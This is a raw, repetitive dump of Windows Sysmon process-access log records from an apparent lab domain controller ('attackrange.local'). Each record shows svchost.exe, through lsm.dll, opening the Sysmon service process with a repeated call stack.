09:20:17.457{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053285Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.457{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053284Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.457{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053283Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.457{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053282Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.457{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053281Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.457{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053280Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.457{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053279Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.457{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053278Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.441{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053277Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.441{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053276Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.441{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053275Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.441{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053274Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.441{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053273Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.441{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053272Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.441{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053271Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.441{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053270Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.441{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053269Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.441{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053268Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.425{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053267Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.425{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053266Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.425{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053265Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.425{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053264Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.425{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053263Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.425{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053262Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 